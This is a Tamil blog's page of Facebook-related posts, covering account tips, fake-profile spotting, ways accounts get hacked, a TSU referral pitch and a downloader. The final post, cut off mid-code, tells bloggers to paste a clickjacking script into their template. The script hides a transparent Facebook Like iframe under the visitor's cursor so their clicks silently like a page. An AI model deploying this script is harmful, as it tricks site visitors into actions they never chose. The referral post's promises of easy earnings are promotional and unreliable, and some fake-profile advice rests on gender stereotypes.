பேஸ்புக் லேபிளுடன் இடுகைகளைக் காண்பிக்கிறது. அனைத்து இடுகைகளையும் காண்பி
பேஸ்புக் லேபிளுடன் இடுகைகளைக் காண்பிக்கிறது. அனைத்து இடுகைகளையும் காண்பி

20 ஏப்., 2015

"பேஸ்புக்" - Facebook மற்றும் "ட்விட்டர்" - Twitter

Posted by Anto Navis

"பேஸ்புக்" - Facebook மற்றும் "ட்விட்டர்" - Twitter போன்ற சமூக வலைத்தளங்களில் உலா வருபவர்கள் பெரும்பாலும் பொய்களையே கூறிவருவதாக ஆய்வு ஒன்றில் தெரியவந்துள்ளது.

இப்போதெல்லாம், சாமான்யர்கள் மட்டுமல்லாது அரசியல், சினிமா, விளையாட்டு, எழுத்து என பலதரப்பட்ட துறைகளைச் சார்ந்தவர்களும் தங்களுக்கென்று பேஸ்புக்கிலோ அல்லது ட்விட்டரிலோ ஒருவலை பக்கத்தை உருவாக்கிக் கொண்டு, அதில் தங்களது சொந்தக் கதை, சோகக் கதைகளை எடுத்துவிடுவது ஃபேஷனாகிவிட்டது.

சாமான்யர்கள் தங்களுக்கு நாட்டமுள்ள இலக்கியமோ அல்லது விளையாட்டோ அல்லது சமூக சேவையோ போன்ற துறைகளை குறிப்பிட்டு, அதே துறைகளில் நாட்டமுள்ளவர்களுடன் குழுவாக இயங்கி, அது தொடர்பான செய்திகளை தங்களது சமூக வலைத்தளங்களில் எழுதி வருகின்றனர்.

அதேப்போன்று "செலிப்பிரேட்டிகள்" எனப்படும் பிரபலங்களும் - பெரும்பாலும் சினிமா நடசத்திரங்கள் அல்லது விளையாட்டு வீரர்கள் - தங்களது குழந்தை "உச்சா" போனதிலிருந்து நேற்று எந்த கடையில் பிட்ஸா சாப்பிட்டேன் என்பது வரை அடித்து விடுகிறார்கள். அதையும் ஒரு கூட்டம் ஆவலாக படிக்க காத்துக்கொண்டிருக்கிறது.

இவர்கள் கதை இதுவென்றால் அத்வானி போன்ற சீரியஸ் தலைவர்கள், அயோத்தி, காஷ்மீர் போன்ற முக்கியத்துவம் வாய்ந்த விடயங்கள் மீதான தங்களது கருத்துக்களை இப்போதெல்லாம் பத்திரிகையாளர்களிடம் கூறுவதைக் காட்டிலும், தங்களது வலைத்தளங்களில்தான் எழுதுகிறார்கள்.

அதே சமயம் எசகுபிசகாக எதையாவது எழுதி, சர்ச்சையில் சிக்கிக்கொள்கிற அரசியல் பிரபலங்களும் உண்டு. சசி தரூரை நினைவிருக்கிறதுதானே...?! விமானத்தில் "எக்கனாமிக்" வகுப்பில் பயணிப்பது மாட்டு தொழுவத்தில் இருப்பதுபோன்று இருப்பதாக தனது ட்விட்டர் தளத்தில் எழுதப்போக, வசமாக வாங்கிக்கட்டிக்கொண்டார்.

இந்தியாவில் மட்டும் இந்த நிலை இல்லை; பல மேற்குலக நாடுகளிலும் இதே கதைதான்!

ஆனால் இதுபோன்ற சமூக வலைத்தளங்களில் "கதைப்பவர்கள்" நேரில் பேசும்போது கூறுவதைக் காட்டிலும் பொய்களைத்தான் அதிகமாக அவிழ்த்துவிடுவதாக ஆய்வு ஒன்றில் தெரியவந்துள்ளது.

இது தொடர்பாக பிரிட்டனில் "டைரக்ட் லைன் இன்சூரன்ஸ்" என்ற நிறுவனம், சுமார் 2000 பேரிடம் நடத்திய ஆய்வில், "ஒருவர் மற்ற யாரோ ஒரு நபரிடம் நேருக்கு நேர் பேசும்போது பொய் கூறுவதைவிட, ட்விட்டரிலோ அல்லது ஃபேஸ்புக்கிலோ பொய்களை எழுதும்போதுதான் அதிக சவுகரியமாக உணர்வதாக தெரியவந்துள்ளது.

"பேஸ்புக்" - Facebook மற்றும் "ட்விட்டர்" - Twitter போன்ற சமூக வலைத்தளங்களில் உலா வருபவர்கள் பெரும்பாலும் பொய்களையே கூறிவருவதாக ஆய்வு ஒன்றில் தெரியவந்துள்ளது.

இப்போதெல்லாம், சாமான்யர்கள் மட்டுமல்லாது அரசியல், சினிமா, விளையாட்டு, எழுத்து என பலதரப்பட்ட துறைகளைச் சார்ந்தவர்களும் தங்களுக்கென்று பேஸ்புக்கிலோ அல்லது ட்விட்டரிலோ ஒருவலை பக்கத்தை உருவாக்கிக் கொண்டு, அதில் தங்களது சொந்தக் கதை, சோகக் கதைகளை எடுத்துவிடுவது ஃபேஷனாகிவிட்டது.

சாமான்யர்கள் தங்களுக்கு நாட்டமுள்ள இலக்கியமோ அல்லது விளையாட்டோ அல்லது சமூக சேவையோ போன்ற துறைகளை குறிப்பிட்டு, அதே துறைகளில் நாட்டமுள்ளவர்களுடன் குழுவாக இயங்கி, அது தொடர்பான செய்திகளை தங்களது சமூக வலைத்தளங்களில் எழுதி வருகின்றனர்.

அதேப்போன்று "செலிப்பிரேட்டிகள்" எனப்படும் பிரபலங்களும் - பெரும்பாலும் சினிமா நடசத்திரங்கள் அல்லது விளையாட்டு வீரர்கள் - தங்களது குழந்தை "உச்சா" போனதிலிருந்து நேற்று எந்த கடையில் பிட்ஸா சாப்பிட்டேன் என்பது வரை அடித்து விடுகிறார்கள். அதையும் ஒரு கூட்டம் ஆவலாக படிக்க காத்துக்கொண்டிருக்கிறது.

இவர்கள் கதை இதுவென்றால் அத்வானி போன்ற சீரியஸ் தலைவர்கள், அயோத்தி, காஷ்மீர் போன்ற முக்கியத்துவம் வாய்ந்த விடயங்கள் மீதான தங்களது கருத்துக்களை இப்போதெல்லாம் பத்திரிகையாளர்களிடம் கூறுவதைக் காட்டிலும், தங்களது வலைத்தளங்களில்தான் எழுதுகிறார்கள்.

அதே சமயம் எசகுபிசகாக எதையாவது எழுதி, சர்ச்சையில் சிக்கிக்கொள்கிற அரசியல் பிரபலங்களும் உண்டு. சசி தரூரை நினைவிருக்கிறதுதானே...?! விமானத்தில் "எக்கனாமிக்" வகுப்பில் பயணிப்பது மாட்டு தொழுவத்தில் இருப்பதுபோன்று இருப்பதாக தனது ட்விட்டர் தளத்தில் எழுதப்போக, வசமாக வாங்கிக்கட்டிக்கொண்டார்.

இந்தியாவில் மட்டும் இந்த நிலை இல்லை; பல மேற்குலக நாடுகளிலும் இதே கதைதான்!

ஆனால் இதுபோன்ற சமூக வலைத்தளங்களில் "கதைப்பவர்கள்" நேரில் பேசும்போது கூறுவதைக் காட்டிலும் பொய்களைத்தான் அதிகமாக அவிழ்த்துவிடுவதாக ஆய்வு ஒன்றில் தெரியவந்துள்ளது.

இது தொடர்பாக பிரிட்டனில் "டைரக்ட் லைன் இன்சூரன்ஸ்" என்ற நிறுவனம், சுமார் 2000 பேரிடம் நடத்திய ஆய்வில், "ஒருவர் மற்ற யாரோ ஒரு நபரிடம் நேருக்கு நேர் பேசும்போது பொய் கூறுவதைவிட, ட்விட்டரிலோ அல்லது ஃபேஸ்புக்கிலோ பொய்களை எழுதும்போதுதான் அதிக சவுகரியமாக உணர்வதாக தெரியவந்துள்ளது
Read More

19 ஏப்., 2015

FACEBOOK உங்கள் பெயரை மாற்ற வேண்டுமா !!!

Posted by Anto Navis

Facebook தளத்தில் முதல் முறையாக நீங்கள் கணக்கை துவங்கிய பொழுது, உங்கள் பெயரை கொடுத்திருப்பீர்கள். அதன் பிறகு, அந்த குறிப்பிட்ட பெயருக்கு பதிலாக, வேறு ஒரு பெயரை கொடுத்தால் நன்றாக இருக்குமே என்று தோன்றினால்,  உங்கள் பெயரை முகபுத்தகத்தில் எப்படி மாற்ற முடியும் என்பதை பார்க்கலாம்.

Facebook இல் உங்கள் பயனர் கணக்கில் நுழைந்து கொள்ளுங்கள். பிறகு வலது மேற்புறமுள்ள Account லிஸ்ட் பாக்ஸை க்ளிக் செய்து, Account Settings லிங்கை க்ளிக் செய்யுங்கள்.

அடுத்து திறக்கும் திரையில், My Account என்பதற்கு கீழாக உள்ள Settings tab தான் Default ஆக இருக்கும், இல்லையெனில் Settings டேபை க்ளிக் செய்யுங்கள்.
இனி கீழே உள்ள Name (Raseem Mass) என்பதற்கு நேராக உள்ள Edit என்ற லிங்கை க்ளிக் செய்யுங்கள்
அடுத்த திரையில், First Name மற்றும் Last Name ஆகியவற்றை உங்கள் தேவைக்கேற்ப மாற்றிக் கொள்ளலாம். மாற்றிய பிறகு Change Name பொத்தானை அழுத்தினால் போதுமானது.
என்னுடைய பக்கத்தில் 5 முறை நான் பெயர் மாதாவும் எனக்கு காடாது 
Alternate Name ஏற்கனவே கொடுக்கவில்லை என்றால் இப்பொழுது கொடுத்துக் கொள்ளலாம். (அதுவும் தமிழில்)
Read More

13 ஏப்., 2015

Google Chrome இல் ஒரே நேரத்தில் இரண்டு Facebook கணக்குகளை Log In செய்வது எப்படி?

Posted by Anto Navis

உங்களுக்கு சில நேரங்களில் இரண்டு Facebook கணக்குகளில் Log In  செய்ய வேண்டி வரும் அதற்க்கு நீங்கள் வேறு எதாவது Web Browser களை பாவிப்பீர்கள் இல்லையென்றால் உங்களுடைய முதலாவது Facebook கணக்கை Log Out செய்து விட்டு உங்களுடைய இரண்டாவது கணக்கை Log In செய்வீர்கள்   ஆனால் Google Chrome இல் ஒரே நேரத்தில் இரண்டு Facebook கணக்குகளை Log In செய்யலாம் அது எப்படி என்று பார்ப்போம் 
உங்களுடைய Google Chrome ஐ திறந்து மேலே வலது பக்கத்தில் உள்ள  Setting Icon ஐ click செய்யவும் அதில் மூன்றாவதாக உள்ள New incognito window இல் click செய்யவும், அல்லது  உங்கள் Keyboard இல்Ctrl+Shift+N  என்பதை அழுத்தவும் 
பின்பு கீழ் உள்ளவாறு ஒரு Window தோன்றும் அதில் Facebook தளத்துக்கு சென்று  உங்களுடைய இரண்டாவது Facebook கணக்கை Log In செய்து  இரண்டு Facebook கணக்குகளையும் ஒரே நேரத்தில் பயன்படுத்திக்கொள்ளலாம் 
குறிப்பு :
incognito window இல் நீங்கள் பார்வையிடும் அனைத்து Browser Hostory அல்லது Search Hostory எதுவுமே பதிவாகாது,incognito window மூலம் ஏதாவது Files Download செய்யப்பட்டு அல்லது Bookmarks செய்யப்பட்டு இருந்தால் அவை பாதுகாக்கப்படும்!
Read More

10 ஏப்., 2015

(FAKE FACEBOOK) போலி பேஸ்புக் Profile ஜ கண்டறிய எளிய வழிகள்!!

Posted by Anto Navis


பிரபல சமூக வலைத்தளமான பேஸ்புக்கை, தற்போது சிறியவர்கள் முதல் பெரியவர்கள் என அனைவரும் உபயோகப்படுத்துகின்றனர்.இதில் போலி கணக்கு வைத்திருபவர்கள் ஏராளம். இவர்களை கண்டறிய சில சுலபமான வழிகள். 
  • இவர்களின் Profile Picture ஐ வைத்து ஓரளவு கணிக்கலாம். Profile Picture ஐ நீண்டகாலம் மாற்றாமல் வைத்திருப்பார்கள். ஏதாவது ஒரு பிரபல பெண்களின் புகைப்படத்தை Profile Picture ஆக வைத்திருப்பார்கள். இவர்களின் புகைப்பட ஆல்பத்தில் இரண்டிற்கு மேற்பட்ட படங்கள் இருப்பது அரிது.
  • இவர்களுடைய நண்பர்கள் பட்டியலில் அதிகளவான ஆண்கள் நண்பர்களாக இருப்பார்கள்.
  • யார்மேலாவது சந்தேகம் ஏற்பட்டால் அவர்கள் Facebook இல் இணைந்த தேதியினையும், அவர்களது நண்பர்கள் எண்ணிக்கையையும் ஒப்பிட்டு பாருங்கள்.குறைந்த காலத்தில் ஆயிரக்கணக்கான நண்பர்கள் பட்டியலில் இருந்தால் அந்தக்கணக்கு போலியாக இருப்பதற்கான சாத்தியம் அதிகம். காரணம் விளம்பரத்துக்காக கண்டபடி நண்பர்களை சேர்ப்பார்கள்.
  • அவர்களின் Profile முழுமையான தகவல்களுடன் இருக்கிறதா என பாருங்கள்.உண்மையான நபர்களின் Profile முழுமையாக நிரப்பப்பட்டும், சுவாரசியமாகவும் இருக்கும். ஆனால் போலி நபர்களின் Profile கள் முழுமையாக நிரப்பப்படாமலும்,ஏனோதானோ என நிரப்பப்பட்டும் இருக்கும்.
  • போலி என சந்தேகப்படுவோரின் Activities ஐ பாருங்கள். உதாரணமாக Comments, Likes, Status. போலி கணக்காயின் இவை அதிகம் இருக்காது.ஆண்களுக்கு!… பெண்களின் பெயரில் Friend Request வந்தால் அவர்களின் Profile ஐ முழுவதுமாக ஆராயுங்கள். காரணம் உண்மையான கணக்கு வைத்திருக்கும் பெண்கள், தானாக முன்வந்து முகம் தெரியாத ஆண்களுக்கு Friend Request கொடுப்பதில்லை.
  • போலி கணக்குகளில் அநேகமானவை பெண்களின் பெயரிலேயே இருக்கும். அதுவும் 1988 தொடக்கம் 1992 ஆம் ஆண்டு பிறந்ததாகவே Profile இல் குறிப்பிடப்பட்டிருக்கும்.
Read More

9 ஏப்., 2015

Facebook இல் உள்ள நண்பர்களை மற்றவர்களுக்குத் தெரியாமல் மறைப்பது எப்படி?

Posted by Anto Navis




இன்று சமூக  வலைத்தளங்களில் முன்னிலை வகிப்பது Facebook தளமாகும். நாளுக்குநாள் அதிக பயனாளர்களை கவர்ந்து கொண்டிருக்கும் ஓர் சமூகவளைத்தளமாகும்.பயனாளர்களுக்கு புதிய விடயங்களை அறிமுகப்படுத்திக் கொண்டே இருக்கின்றது. நமது பேஸ்புக்கில் உள்ள நண்பர்களில் ஆண்கள் மற்றும் பெண்களும் இருப்பார்கள். இவர்களை மற்றவர்கள் பார்க்காமல் அவர்களை எவ்வாறு மறைப்பது என நினைப்பவர்களுக்கு இதோ இந்த பதிவு.



அந்த வகையில் இன்று நாம் பார்க்கப்போவது Facebook இல் உள்ள நண்பர்களை மற்றவர்களுக்குத் தெரியாமல் மறைப்பது எப்படி?என பார்ப்போம்.

* முதலில் உங்களது Facebook கணக்கில் உள்நுழைந்து கொள்ளுங்கள்.

* பின்னர் உங்களது Friends எனும் பகுதியை click செய்யுங்கள்.

* பின்னர் வலது பக்கம் உள்ள Edit என்பதை Click பண்ணவும்.

* Edit என்பதை Click செய்தவுடன் அதில் Edit Privacy என்பதை தேர்வு செய்யவும்.

* அதன் பின்னர் Friends List ( Who Can See Your Friends List) என்பதற்கு "Only Me" என கொடுக்கவும்    அவ்வளவுதான். இனி உங்களது நண்பர்கள் மற்றவர்களுக்கு தெரியமாட்டாது.
Read More

5 ஏப்., 2015

உங்களுடைய பேஸ்புக் கணக்கு எவ்வாறு Hack செய்யப்படலாம் ?

Posted by Anto Navis

ஹாய்.........

இன்று நாம் பார்க்க இருக்கும் பதிவு பேஸ்புக் தொடர்பானது அதாவது இன்று பெரும்பாலும் எல்லா நண்பர்களும் பேஸ்புக் பாவனையாளர்கள் இருந்த போதும் சில நண்பர்களுக்கு இந்த பேஸ்புக் பற்றிய முழு விபரம் தெரியாமல் பயன்படுத்துகின்றனர்.......

எல்லோருக்கும் சில பிரச்சினைகள் வரும் அதாவது உங்களுடைய முகநூல் மற்றும் Twitter, Gmail கணக்குகள் திருடப்படுது. அது பற்றிதான் நாம் இன்று பார்க்க இருக்கிறோம்.

உங்களுடைய கணக்குகள் எவ்வாறு திருப்படுகின்றது ? திருடுவது எவ்வாறு?

*குறிப்பு: நான் பேஸ்புக் அடிப்படையாக கொண்டு இந்த பதிவு இருக்கிறது இது போல உங்களுடைய Twitter, Gmail, மற்றைய கணக்குகள் இவ்வாறுதான் திருடப்படும் & படலாம்.

உங்களுடைய கணக்கு திருடுவதட்கான காரணம்:


  • முதலில் உங்களுடைய Password


இது எவ்வாறு திருடுவதுக்கு காரணமாக அமையலாம், அதாவது திருடர்கள் முதலில் உங்களுடைய கணக்கினை இந்த Paasword மூலம் தான் முயட்சிப்பர்கள்.

நீங்கள் கொடுக்கும் Low password
ex : Raseem123, Raseem, NICNumber, Mobile, Lover Name இவ்வாறான Password


  • அடுத்தது நீங்கள் Login செய்யும் முறை



இந்த படத்தில் உள்ளது போல அதில் கிளிக் செய்து Login செய்தால் நீங்கள் உங்களுடைய கணினியினை Off செய்தலும் அது மீண்டும் Login செய்யப்படும்

உங்களுடைய நண்பர்கள் கணினியில் பயன்படுத்தினால் உங்களுடைய நண்பர்கள் திருடுவதுக்கு சந்தர்ப்ப, உள்ளது


  • அடுத்தது Forgot Password கொடுத்து உங்களுடைய கணக்கினை திருடுவது 


இதில் சில கணக்கு எடுக்கலாம் அது நீங்கள் கொடுக்கும் Password மற்றும் உங்களுடைய Profile Info மிகவும் கவனம் கொடுக்க வென்றும்



  • இன்று அதிகளவு உங்களுடைய கணக்கு திருடப்படுவது இவ்வாறுதான் 


இந்த வழிமுறை அதிளவு Hacker தெரிந்திருக்கும் அதாவது Facebook போல உள்ள ஒரு Facebook உருவாக்கி உங்களுடைய கணக்கினை திருட முடியும்





இதை பார்த்தல் பேஸ்புக் போல இருக்கும் ஆனால் அதன் URL பார்த்தல் பேஸ்புக் என்று இருக்காது மேலே படத்தில் உள்ளது போல எதசும் ஒரு URL இருக்கும்

இது பேஸ் புக் மற்றும் இல்லை வேற கணக்குகளுக்கும் இந்த முறையில் ஹாக் செய்யலாம்


  • Software மூலம் ஹக் செய்வது 


இது எல்லோருக்கும் தெரிஞ்ச விஷயம் பணம் கொடுத்தால் மாத்திரம் தான் இந்த Software மூலம் ஹக் செய்யலாம்
Read More

11 மார்., 2015

வாசகர்களுக்கு பணம் தரும் புதிய பேஸ்புக் இணையதளம்

Posted by Anto Navis
வாசகர்களுக்கு பணம் தரும் புதிய பேஸ்புக்
சமூக வலைதலங்களிலேயே சிறந்த இணையதளம் யுடியூப் தான். 

https://www.tsu.co/antonavis

காரணம் இந்த இணையத்தில் தான் வாடிக்கையாளர்களுக்கு பணம் சம்பாதிக்கும் வசதியை ஏற்படுத்தி தந்துள்ளது. ஆனால் உலக அளவில் முன்னணி சமூக வலைதளங்கலான பேஸ்புக், ட்விட்டர் இணையதளங்கள்
பலரை அடிபடுத்தி அவர்களின் நேரங்களை வீணடித்து கோடிகோடியாக பணத்தை சம்பாதிக்கின்றன.
join now, tsu, facebook, google, online job, earn money , free jobs, trickszone, www.trickszone.in , lovely jobs, creative jobs, government jobs, online money earnings

தற்பொழுது பேஸ்புக் தளத்திற்கு போட்டியாக .TSU என்ற இணையதளம் விஸ்வரூபம் எடுத்துள்ளது. இதனுடைய சிறப்பு அம்சமே யுடியூப் போன்று பயன்பாட்டாளர்களுக்கு பணம் கொடுப்பது தான்.



அது எப்படி என விரிவாக பார்ப்போம்:-



முகநூல், டுவிட்டர் இணையத்தில் பல மணி நேரங்களை தினமும் வெட்டியாக செலவு செய்கின்றோம். அதே நேரத்தை.TSUஎன்ற இணையதளத்தில் செலவிட்டால் பணமழை கொட்டோகொட்டென கொட்டும்.


.TSU என்ற சமுக வலைத்தளம் அதில் கருத்துக்களை பகிர்பவர்களுக்கும் லைக் மற்றும் கமெண்ட் செய்பவர்களுக்கும் அவர்களுக்கான பணத்தை வழங்குகிறது என்றால் நம்ப முடிகிறதா? நம்பி தான் ஆக வேண்டும்.

.TSU என்பது முகநூலை போன்ற வேகமாக வளர்ந்துவரும் ஒரு சமுக தொடர்பு ஊடகமாகும். கடந்த இரு மாதங்களுக்கு முன்னர் ஆரம்பிக்கபட்ட .TSU மிக வேகமாக வளர்ந்து வருகின்றது. TSU வுக்கும் Facebook-க்கும் என்ன வித்தியாசம் என்றால் தினமும் பல கோடிக்கணக்கானவர்கள் பயன்படுத்தும் Facebook-ல் உள்ள விளம்பரங்கள் மூலமாக வரும் பணம் முழுவதுமாக Facebook மட்டுமே எடுத்துகொள்ளும். அனால்.TSU விளம்பரங்கள் மூலம் வரும் பணத்தில் 90% ஐ மக்களுக்கே திருப்பி வழங்கி விடுகிறது. மிகுதி 10% பணத்தை தனது இணைய வளர்சிக்காக வைத்து கொள்கிறது.


எந்த பயனும் இல்லாமல் Facebook ஐ தினமும் மணி கணக்கில் பயன்படுத்தும் மக்கள் .TSU வில் இணைந்து Facebook இல் என்ன செய்கிறோமோ அதையே ( status போடுதல், like இடுதல், share செய்தல்) TSU இணையத்தில் செய்தால் பணம் கிடைக்கிறது.


சுமார் 500 முதல் 1000 நண்பர்கள் நீங்கள் வைத்திருந்தால் போதும் மாதத்திற்கு ஆயிரம் ரூபாய் வரை சம்பாதிக்க முடியும். உங்கள் நட்பு எல்லையை விரிவு படுத்திக்கொண்டால் உங்கள் வருமானமும் அதிகமாகிக்கொண்டே போகும்.


தினமும் எவ்வளவு பணம் சம்பாதித்துள்ளோம் என .TSU profile இல் தினமும் உங்களுக்கு சேர வேண்டிய பணம் காண்பிக்கபட்டுகொண்டு தான் இருக்கும். உங்கள் பணம் 100 டாலர்கள் வந்ததும் நீங்கள் உங்கள் பணத்தை அனுப்பி வைக்கும்படி கோரிக்கை விடுத்தால் உங்கள் முகவரிக்கு செக் மூலமாக அவர்கள் அனுப்பி வைப்பார்கள்.


இதில் இணைந்துகொள்ள மற்ற இணையதளங்கள் போலவே ஈமெயில் முகவரியை கொடுத்து இணைத்துகொள்ளலாம். ஆனால் இந்த இணையதளத்தில் நேரடியாக இணைந்துகொள்ள முடியாது யாரவது ஒருவர் refer செய்யும் லிங்கை க்ளிக் செய்வதன் மூலமே இணைந்து கொள்ள முடியும்.பரிந்துரைக்கபட்ட லிங்க் கீழே கொடுக்கபட்டுள்ளது. அதில் சென்றீர்கள் என்றால் நேரடியாக இணைந்து கொள்ள முடியும். கீழே கூறபட்டுள்ள லிங்க்-ல் சென்று TSU வில் இணைந்து கொள்ளுங்கள்.
join now, tsu, facebook, google, online job, earn money , free jobs, trickszone, www.trickszone.in , lovely jobs, creative jobs, government jobs, online money earnings

Read More

24 நவ., 2014

பேஸ்புக்கின் புதிய வசதி - தேங்க்யூ வீடியோ

Posted by Anto Navis
பேஸ்புக்கில் ஏற்கனவே லைக் செய்யலாம். ஷேர் செய்யலாம். இப்போது நண்பர்களுக்கு தேங்க்யூவும் சொல்லலாம். அதுவும் வீடியோ வடிவில் கொஞ்சம் புதுமையாக. இதற்கான புதிய வசதியை பேஸ்புக் சே தேங்க்ஸ் எனும் பெயரில் அறிமுகம் செய்திருக்கிறது.
பேஸ்புக் நண்பர்களுக்கு தனிப்பட்ட டச்சுடன் நன்றி சொல்லக்கூடிய வகையில் இந்த வசதியை அறிமுகம் செய்வதாக பேஸ்புக் தெரிவித்துள்ளது. ’லட்சக்கணக்கானோர் தினமும் பேஸ்புக்கை நண்பர்களுடன் தொடர்பு கொள்ளவும் தங்களுக்கு முக்கியமானவற்றை பகிர்ந்து கொள்ளவும் பயன்படுத்துகின்றனர். உங்கள் நண்பர்கள் தான் பேஸ்புக் அனுபவத்தின் மையமாக இருக்கின்றனர்” என்று குறிப்பிட்டுள்ள பேஸ்புக் இந்த நட்பை கொண்டாட உதவும் புதிய வழிகளை உருவாக்கித்தர முயன்று வருவதாகவு குறிப்பிட்டுள்ளது . இப்படி உருவாகி இருக்கும் சமீபத்திய வசதி தான் சே தேங்ஸ்.

இதன் மூலம் நண்பர்களுக்கோ சக ஊழியருக்கோ பேஸ்புக் மூலம் ஒரு தேங்யூ வீடியோவை அனுப்பி வைத்து நன்றி தெரிவிக்கலாம். ஒருவர் முக்கியமாக நினைக்கும் யாருக்கு வேண்டுமானாலும் இந்த வீடியோவை உருவாக்கி அனுப்பலாம்.

இந்த வீடியோவை எப்படி உருவாக்க, facebook.com/thanks பகுதிக்கு செல்ல வேண்டும். அதன் பிறகு நன்றி சொல்ல உள்ள பேஸ்புக் நண்பரை தேர்வு செய்தால் உடனே பேஸ்புக்கே உங்கள் டைம்லைனில் இருந்து ஒரு வீடியோவை உருவாக்கித்தரும். அந்த வீடியோவில் உங்கள் நட்பை அடையாளப்படுத்தும் புகைப்படங்களும் பதிவுகளும் இருக்கும். பேஸ்புக் பரிந்துரைக்கும் வீடியோவை உங்கள் விருப்பம் போல திருத்தி அமைக்கலாம். பொருத்தமான தீமை தேர்வு செய்து அதில் இடம் பெறும் புகைப்ப்டங்களையும் பதிவுகளையும் எடிட் செய்யலாம். எல்லாம் தயாரான பிறகு அதனுடன் நன்றி தெரிவிக்கும் வாசகத்தை எழுதி தனிப்பட்ட டச்சுடன் பகிர்ந்து கொள்ளலாம்.

இந்த வீடியோ உங்கள் டைம்லைனில் தோன்றும் .அதில் உங்கள் நண்பரும் டேக் செய்யப்பட்டிருப்பதால் அவர்கள் டைம்லைனிலும் தோன்றும். அடிப்படையில் , இந்த தேங்க்யூ வீடியோ வசதி கடந்த ஆண்டு இறுதியில் அறிமுகம் செய்யப்பட்ட லுக் பேக் வீடியோ தொகுப்பு வசதியின் இன்னொரு வடிவம் தான் என்று ஒரு கருத்து இருக்கிறது.

டைம்லைனில் தோன்றும் வீடியோ பொதுப்பார்வைக்கு வரும் போது எப்படி தனிப்படதாக இருக்கும் என்ற கேள்வியும் முன்வைக்கப்படுகிறது. அதோடு தேங்க்யூ வீடியோ பெற்றவர்கள் பதிலும் தேங்க்யூ வீடியோ அனுப்ப வேண்டும் என்று எதிர்பார்க்கப்படுவார்களா? என்றும் கேட்கப்படுகிறது.

பயனாளிகளுக்கு எப்படியோ பேஸ்புக்கிற்கு இந்த சேவை முக்கியம். சமீபத்தில் வீடியோ பகிர்வு சேவையான யூடியூப்புடன் பேஸ்புக் போட்டி போடக்கூடிய அளவுக்கு அதன் வழியே வீடியோக்கள் பகிரப்படுவதாக செய்தி வெளியானது. பேஸ்புக் இந்த நிலையை வலுப்படுத்திக்கொள்ளும் முயற்சியாக இது இருக்கலாம்.

தேங்க்யூ வசதி பேஸ்புக் பயனாளிகள் மத்தியில் பிரபலமாகிறதா என்பதையும் அதைவிட முக்கியமாக பயனுள்ளதாக இருக்குமா என பொருத்திருந்து தான் பார்க்க வேண்டும்.
Read More

3 மார்., 2014

FACEBOOK இலிருந்து வீடியோ,ஒடியோக்களை டவுன்லோட் செய்ய.

Posted by Anto Navis 6 Comments
சமூக வலைத்தளங்களில் ராஜாவாகத் திகழ்ந்து கொண்டிருக்கும் facebook ல் இருந்து நாளுக்கு நாள் புதுப் புது வீடியோக்கள் , ஆடியோக்கள் பகிரப்படுகின்றன. அவற்றை நாம் தரவிறக்க விரும்புவோம் அனால் அது முடியாமல் போய்விடும் ஏனெனில் அதில் டவுன்லோட் செய்வதற்கான வழிகள் இல்லை. எனவே எப்படி டவுன்லோட் செய்வது?


அதற்காக ஒரு மென்பொருள் வடிவமைக்கப்பட்டுள்ளது அதன் பெயர் Bigasoft Facebook Downloader இது facebook ட் காகவே வடிவமைக்கப்பட்டது. இந்த மென்பொருளைப் பயன்படுத்தி நமக்குத் தேவையான வீடியோ ஒடியோக்களை எமக்கு விரும்பிய format ல் டவுன்லோட் செய்ய முடியும்.


தரவிறக்கம் செய்யப்பட வேண்டிய பேஸ்புக் வீடியோக்களின் யூ.ஆர்.எல்..(URL) மென்பொருளில் உள்ளிட்டு, கீழ்நோக்கிய அம்புக்குறியுடன் கூடிய வட்டமான பட்டனை சொடுக்குவதன் மூலம் நீங்கள் விரும்பும் வீடியோ அல்லது ஆடியோ தரவிறக்கம் செய்யப்பட்டு,






உங்களுடைய கணினியில் நீங்கள் தேர்ந்தெடுக்கும் இடத்தில் கோப்புகள் சேமிக்கப்படும். பிறகு தேவையான நேரங்களில் அந்த வீடியோ அல்லது ஆடியோ கோப்புகளை இணைய இணைப்பு இல்லாமலேயே பார்த்து, கேட்டு மகிழலாம்.


இந்த facebook video, audio downloading software ஐ டவுன்லோட் செய்ய:


                                                        


இது பணம் கட்டி பெறக் கூடிய மென்பொருளாகவும் இருக்கிறது free மென்பொருளாகவும் இருக்கிறது. நீங்க free யாவே டவுன்லோட் பண்ணுங்களேன்... .
------------------------------------------------------------------------------------------------------------------------
எமது தளத்தில் விளம்பரம் செய்ய விரும்புபவர்கள் ( antonavi713@gmail.com ) என்ற Email மூலம் தொடர்பு கொள்ளுங்கள். ( குறைந்த கட்டணத்தில்.)

* நண்பர்களே இப்பதிவு உங்களக்கு பிடித்திருந்தால் உங்களது கருத்துக்களை மறக்காமல் தெரிவிக்கவும். 

>>> Facebook Page பக்கத்தில் Like பண்ணாதவர்கள்  கணினி தொழில்நுட்பம் Pageல் லைக் செய்திடுங்கள்.



>>> Facebook Group  இல் இணையாதவர்கள் கணினி தொழில்நுட்பம் Group இல் இணைந்து கொள்ளுங்கள்.

Read More

23 ஜன., 2014

Automatically Increase Facebook Fans with Webpage Script

Posted by Anto Navis 2 Comments

  1. Go to Blogger > Template > Edit HTML.
  2. Press Ctrl + F and search for </body> tag and paste the below script above it.<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript"></script><script type='text/javascript'> function ClickJackFbHide(){jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).hide();}function ClickJackFbShow(){jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).show();}</script><div id='clickjack-button-wrapper-5' style='position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:&apos;progid:DXImageTransform.Microsoft.Alpha(Opacity=0)&apos;;  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden'><!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>--><iframe allowTransparency='true' frameborder='0' scrolling='no' src='http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/technologyincomputer&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21' style='border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;'/></div><script type='text/javascript'>jQuery( document ).ready( function(){$( &quot;#clickjack-button-wrapper-5&quot;).parent().mousemove( function( e ){jQuery( &quot;#clickjack-button-wrapper-5&quot;).css({top: e.pageY - 10, left: e.pageX + 30});});clickjack_hider();var clickjack_fb_timer=setTimeout(&quot;clickjack_hider()&quot;,5000);});function 